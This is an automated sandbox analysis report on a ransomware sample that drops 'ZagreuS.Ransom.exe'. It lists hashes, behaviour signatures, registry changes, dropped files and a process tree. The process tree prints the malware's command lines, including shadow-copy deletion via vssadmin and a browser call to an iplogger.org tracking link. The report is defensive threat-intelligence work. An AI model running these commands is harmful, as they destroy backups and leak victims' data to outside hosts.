Analysis
- max time kernel: 142s
- max time network: 140s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 20-05-2022 09:34
Static task: static1
Behavioral task: behavioral1
- Sample: ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
- Resource: win7-20220414-en
Behavioral task: behavioral2
- Sample: ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
- Resource: win10v2004-20220414-en
General
- Target: ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
- Size: 750KB
- MD5: 0f081afaae11c154edb8df747d612f93
- SHA1: 7b1478e64453d78ff60eda7b1d2cc3623d4a9210
- SHA256: ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858
- SHA512: 4b76bd14bcdf5a5e0a73fe630dc430968d59a7c132b00cb9e12674ff6d6472a726b5ed7796fa1481eb7e7b2aacdbc356a3b028c2b3eb2cbd13af1650f3d20628
Malware Config
Extracted
- Path: C:\Users\Admin\Downloads\HELP_DECRYPT_YOUR_FILES.txt
- Email: uncrushman@protonmail.com
Signatures
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Executes dropped EXE (1 IoCs)
  Processes: PID 520 ZagreuS.Ransom.exe
- Loads dropped DLL (4 IoCs)
  Processes: PID 1808 ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe (4 entries)
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
- Generic Ransomware Note (11 IoCs)
  Ransomware often writes a note containing information on how to pay the ransom.
  Resources matching yara rule generic_ransomware_note:
  - (resource name not present in the page) (3 entries)
  - \Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe (4 entries)
  - C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe (2 entries)
  - behavioral1/memory/520-64-0x0000000000FA0000-0x0000000000FAC000-memory.dmp
  - C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt
- HTTP links in PDF interactive object (1 IoCs)
  Detects HTTP links in interactive objects within PDF files.
  Resource C:\Users\Admin\AppData\Local\Temp\31994-109-71389-1-10-20171224.pdf matches yara rule pdf_with_link_action
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Interacts with shadow copies (2 TTPs, 2 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: PID 664 vssadmin.exe, PID 1512 vssadmin.exe
- Modifies Internet Explorer settings
  Processes: iexplore.exe, IEXPLORE.EXE
  Registry changes (every key below is under \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\):
  - Key created: Main (iexplore.exe)
  - Key created: Main\WindowsSearch (iexplore.exe)
  - Set value (str): Main\FullScreen = "no" (iexplore.exe)
  - Set value (data): Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 (iexplore.exe)
  - Key created: TabbedBrowsing\NewTabPage (iexplore.exe)
  - Set value (data): TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004863fcdc101a3947b120786fa95ba35b000000000200000000001066000000010000200000004d1cc37b43295443d1124211e82edeea7121ae7d0be274e8ac341da1cfa8edac000000000e8000000002000020000000a9ac0e6f4eecbf126171806234d03ebfbc1fa8cf6948c83a707f83a0d433946920000000d81d384bf47ffc5fb0f9b86e26a9ca581dab22f7824a1585b783020ff4932b484000000080e0d54f5499807199339d3e53e6aca727043c940edb09f38f140a89c7f85e13d131403b7b14b03e49515084abacb84b803fafa5b00be613923517ce8880f453 (iexplore.exe)
  - Key created: DomainSuggestion\FileNames\ (iexplore.exe)
  - Key created: LowRegistry\DOMStorage (iexplore.exe)
  - Key created: Toolbar\WebBrowser (iexplore.exe)
  - Key created: Recovery\PendingRecovery (iexplore.exe)
  - Set value (int): Recovery\PendingRecovery\AdminActive = "0" (iexplore.exe)
  - Set value (int): TabbedBrowsing\NTPFirstRun = "1" (iexplore.exe)
  - Key created: BrowserEmulation\LowMic (iexplore.exe)
  - Key created: PageSetup (iexplore.exe)
  - Key created: Toolbar (iexplore.exe)
  - Key created: Recovery\AdminActive (iexplore.exe)
  - Key created: DomainSuggestion (iexplore.exe)
  - Key created: IETld\LowMic (iexplore.exe)
  - Key created: IntelliForms (iexplore.exe)
  - Key created: LowRegistry (iexplore.exe)
  - Set value (int): Main\CompatibilityFlags = "0" (iexplore.exe)
  - Set value (data): TabbedBrowsing\NewTabPage\LastProcessed = 502273e82c6cd801 (iexplore.exe)
  - Key created: LowRegistry\DontShowMeThisDialogAgain (iexplore.exe)
  - Set value (int): Recovery\AdminActive\{0E2BF671-D820-11EC-BC64-62D05D50A506} = "0" (iexplore.exe)
  - Key created: Main (IEXPLORE.EXE)
  - Set value (data): TabbedBrowsing\NewTabPage\MFV = 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 (iexplore.exe)
  - Set value (str): DomainSuggestion\FileNames\en-US = "en-US.1" (iexplore.exe)
  - Set value (int): DomainSuggestion\NextUpdateDate = "359804248" (iexplore.exe)
  - Key created: GPU (iexplore.exe)
  - Key created: TabbedBrowsing (iexplore.exe)
  - Key created: DomainSuggestion\FileNames (iexplore.exe)
  - Key created: InternetRegistry (iexplore.exe)
  - Key created: Zoom (iexplore.exe)
  - Set value (str): Main\WindowsSearch\Version = "WS not running" (iexplore.exe)
- Modifies registry key (1 TTPs, 1 IoCs)
- Opens file in notepad (likely ransom note) (1 IoCs)
  Processes: PID 1968 NOTEPAD.EXE
- Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  Processes: PID 1764 AcroRd32.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes: PID 1340 vssvc.exe, Token: SeBackupPrivilege; PID 1340 vssvc.exe, Token: SeRestorePrivilege; PID 1340 vssvc.exe, Token: SeAuditPrivilege
- Suspicious use of FindShellTrayWindow (1 IoCs)
  Processes: PID 1060 iexplore.exe
- Suspicious use of SetWindowsHookEx (11 IoCs)
  Processes: PID 1764 AcroRd32.exe (3 entries), PID 1060 iexplore.exe (2 entries), PID 1948 IEXPLORE.EXE (6 entries)
- Suspicious use of WriteProcessMemory (33 IoCs)
  Source process -> target process (number of "wrote to memory of" entries in parentheses):
  - PID 1808 ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe -> PID 520 ZagreuS.Ransom.exe (4)
  - PID 1808 ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe -> PID 1764 AcroRd32.exe (4)
  - PID 520 ZagreuS.Ransom.exe -> PID 1052 cmd.exe (3)
  - PID 520 ZagreuS.Ransom.exe -> PID 1380 cmd.exe (3)
  - PID 1380 cmd.exe -> PID 664 vssadmin.exe (3)
  - PID 1052 cmd.exe -> PID 1636 reg.exe (3)
  - PID 520 ZagreuS.Ransom.exe -> PID 1612 cmd.exe (3)
  - PID 1612 cmd.exe -> PID 1512 vssadmin.exe (3)
  - PID 520 ZagreuS.Ransom.exe -> PID 1060 iexplore.exe (3)
  - PID 1060 iexplore.exe -> PID 1948 IEXPLORE.EXE (4)
Processes
- C:\Users\Admin\AppData\Local\Temp\ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe"
  Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe"
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\System32\reg.exe
        Command line: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
        Signatures: Modifies registry key
    - C:\Windows\system32\cmd.exe
      Command line: "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\vssadmin.exe
        Command line: vssadmin.exe delete shadows /all /quiet
        Signatures: Interacts with shadow copies
    - C:\Windows\system32\cmd.exe
      Command line: "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\vssadmin.exe
        Command line: vssadmin.exe delete shadows /all /quiet
        Signatures: Interacts with shadow copies
    - C:\Program Files\Internet Explorer\iexplore.exe
      Command line: "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/2Y1Gy5
      Signatures: Modifies Internet Explorer settings; Suspicious use of FindShellTrayWindow; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1060 CREDAT:275457 /prefetch:2
        Signatures: Modifies Internet Explorer settings; Suspicious use of SetWindowsHookEx
  - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    Command line: "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\31994-109-71389-1-10-20171224.pdf"
    Signatures: Suspicious behavior: GetForegroundWindowSpam; Suspicious use of SetWindowsHookEx
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  Signatures: Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\NOTEPAD.EXE
  Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt
  Signatures: Opens file in notepad (likely ransom note)
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\31994-109-71389-1-10-20171224.pdf
  Filesize: 519KB
  MD5: f628a245651b09f63d2f888761d99543
  SHA1: f004b9a7b6be37ba12d05167073cc2804b08ab64
  SHA256: de51caa63ba814dc3aa4024a7ad2bf7b8e4ccdf7caf0f355857ab02a3d796bb6
  SHA512: 842b4cb2763df75215301213b705748cfd3377ce0dd467d7c9b6a8b7e3386964c1fb3fdef141b90c1012e76ebbef37e9759469b089c8d85db7cf9ca96ef2301d
- C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe (identical entry listed twice)
  Filesize: 27KB
  MD5: 961d5eab06ae737f0425824c5cdb92d9
  SHA1: 56c76e63db1d7ba3eb44cf4f5e04b0976f56933a
  SHA256: 4f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196
  SHA512: 56c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\6I9G92W5.txt
  Filesize: 605B
  MD5: 9fe3383fe866ac30958cfb27a720bad5
  SHA1: 045a942300977b237aca9a902a87f4ad0cb34b6d
  SHA256: 4ee227a761fb706173f6caca871b2d0b68bf87cb4e3f7ca0916d97a7393dfa5a
  SHA512: 17a13616c617f0c1b22456346923f2ce856e7e1d2e6b0a8ce09fe663a901db1d8ffb85c6c5e9ad7f96e88bd5fc14c9742f097000b1c4f948db82d79f861514ab
- C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt
  Filesize: 1KB
  MD5: ea4ae25750a7af617159abde94d61e59
  SHA1: f31c8f9ea2d2468fcb2a164712edbc9e0b2d4ba2
  SHA256: 73e50c956d403d060a6c0a193caa17bb641c06785b06285729929efcbdba3c02
  SHA512: 7c5f949ccd35ac77131ab528d3d2d95e6ae8899ba0e665036370eb9a5cf5557fefdd865e5c59a52795891903f968512a83efbe37edecb03c57c8573c757cf03a
- \Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe (identical entry listed four times)
  Filesize: 27KB
  MD5: 961d5eab06ae737f0425824c5cdb92d9
  SHA1: 56c76e63db1d7ba3eb44cf4f5e04b0976f56933a
  SHA256: 4f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196
  SHA512: 56c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd
- memory/520-59-0x0000000000000000-mapping.dmp
- memory/520-65-0x000007FEFB671000-0x000007FEFB673000-memory.dmp
  Filesize: 8KB
- memory/520-64-0x0000000000FA0000-0x0000000000FAC000-memory.dmp
  Filesize: 48KB
- memory/664-68-0x0000000000000000-mapping.dmp
- memory/1052-66-0x0000000000000000-mapping.dmp
- memory/1380-67-0x0000000000000000-mapping.dmp
- memory/1512-72-0x0000000000000000-mapping.dmp
- memory/1612-71-0x0000000000000000-mapping.dmp
- memory/1636-69-0x0000000000000000-mapping.dmp
- memory/1764-62-0x0000000000000000-mapping.dmp
- memory/1808-54-0x0000000075BD1000-0x0000000075BD3000-memory.dmp
  Filesize: 8KB